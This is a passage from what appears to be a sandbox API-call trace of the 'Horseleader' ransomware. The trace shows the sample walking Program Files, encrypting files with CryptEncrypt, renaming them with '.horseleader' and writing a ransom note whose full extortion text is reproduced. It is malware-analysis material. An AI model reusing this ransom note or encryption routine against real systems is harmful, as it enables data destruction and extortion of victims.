liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.778] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.778] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.778] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0225.778] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0225.778] CloseHandle (hObject=0x21c) returned 1 [0225.779] GetProcessHeap () returned 0x780000 [0225.779] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0225.779] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.horseleader") returned 67 [0225.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.horseleader" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.horseleader")) returned 1 [0225.780] GetProcessHeap () returned 0x780000 [0225.780] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0225.780] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 0 [0225.780] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0225.780] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\#Decrypt#.txt") returned 56 [0225.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\designer\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0225.781] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0225.781] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0225.782] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0225.782] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0225.782] CloseHandle (hObject=0x1cc) returned 1 [0225.782] GetProcessHeap () returned 0x780000 [0225.782] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0225.782] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f72cdf0, ftCreationTime.dwHighDateTime=0x1d56620, ftLastAccessTime.dwLowDateTime=0x44cfa7f0, ftLastAccessTime.dwHighDateTime=0x1d5752f, ftLastWriteTime.dwLowDateTime=0x44cfa7f0, ftLastWriteTime.dwHighDateTime=0x1d5752f, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="isspos.exe", cAlternateFileName="")) returned 1 [0225.782] lstrcmpiW (lpString1="isspos.exe", lpString2="Windows") returned -1 [0225.782] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\isspos.exe") returned 44 [0225.783] StrStrIW (lpFirst="isspos.exe", lpSrch=".horseleader") returned 0x0 [0225.783] lstrcmpW (lpString1="isspos.exe", lpString2="#Decrypt#.txt") returned 1 [0225.783] lstrcmpW (lpString1="isspos.exe", lpString2="_uninstalling_.png") returned 1 [0225.783] lstrlenW (lpString=".testttjffg") returned 11 [0225.783] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\isspos.exe", lpSrch=".testttjffg") returned 0x0 [0225.783] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0225.783] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0225.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\isspos.exe" (normalized: "c:\\program files\\common files\\isspos.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0225.783] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0225.783] lstrcmpiW (lpString1="Microsoft Shared", lpString2="Windows") returned -1 [0225.783] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared") returned 50 [0225.783] lstrcmpW (lpString1="Microsoft Shared", lpString2=".") returned 1 [0225.783] lstrcmpW (lpString1="Microsoft Shared", lpString2="..") returned 1 [0225.783] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.783] GetProcessHeap () returned 0x780000 [0225.784] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0225.784] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*") returned 52 [0225.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0225.784] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.784] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\.") returned 52 [0225.784] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.784] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0225.784] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.784] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\..") returned 53 [0225.784] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.784] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.784] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DW", cAlternateFileName="")) returned 1 [0225.784] lstrcmpiW (lpString1="DW", lpString2="Windows") returned -1 [0225.784] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW") returned 53 [0225.784] lstrcmpW (lpString1="DW", lpString2=".") returned 1 [0225.784] lstrcmpW (lpString1="DW", lpString2="..") returned 1 [0225.784] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.784] GetProcessHeap () returned 0x780000 [0225.784] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0225.784] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*") returned 55 [0225.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0225.788] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.788] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\.") returned 55 [0225.789] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.789] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0225.789] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.789] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\..") returned 56 [0225.789] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.789] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.789] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0225.789] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="Windows") returned -1 [0225.789] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 65 [0225.789] StrStrIW (lpFirst="DBGHELP.DLL", lpSrch=".horseleader") returned 0x0 [0225.789] lstrcmpW (lpString1="DBGHELP.DLL", lpString2="#Decrypt#.txt") returned 1 [0225.789] lstrcmpW (lpString1="DBGHELP.DLL", lpString2="_uninstalling_.png") returned 1 [0225.789] lstrlenW (lpString=".testttjffg") returned 11 [0225.789] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpSrch=".testttjffg") returned 0x0 [0225.789] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.789] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.790] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.791] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 65 [0225.791] StrStrW (lpFirst="DBGHELP.DLL", lpSrch=".txt") returned 0x0 [0225.791] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1369952) returned 1 [0225.791] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.791] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.794] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.795] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.795] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xa4bb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.795] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.797] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.797] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.798] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x149760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.798] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.801] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.801] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.801] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.801] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.801] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.801] CloseHandle (hObject=0x158) returned 1 [0225.802] GetProcessHeap () returned 0x780000 [0225.802] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.802] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.horseleader") returned 77 [0225.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.horseleader")) returned 1 [0225.803] GetProcessHeap () returned 0x780000 [0225.803] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.803] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0225.803] lstrcmpiW (lpString1="DW20.EXE", lpString2="Windows") returned -1 [0225.803] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 62 [0225.803] StrStrIW (lpFirst="DW20.EXE", lpSrch=".horseleader") returned 0x0 [0225.803] lstrcmpW (lpString1="DW20.EXE", lpString2="#Decrypt#.txt") returned 1 [0225.803] lstrcmpW (lpString1="DW20.EXE", lpString2="_uninstalling_.png") returned 1 [0225.803] lstrlenW (lpString=".testttjffg") returned 11 [0225.803] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpSrch=".testttjffg") returned 0x0 [0225.803] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.803] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.803] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.865] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 62 [0225.865] StrStrW (lpFirst="DW20.EXE", lpSrch=".txt") returned 0x0 [0225.865] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=994184) returned 1 [0225.865] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.865] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.867] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.868] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.869] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x76dc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.869] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.871] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.871] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.871] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xedb88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | 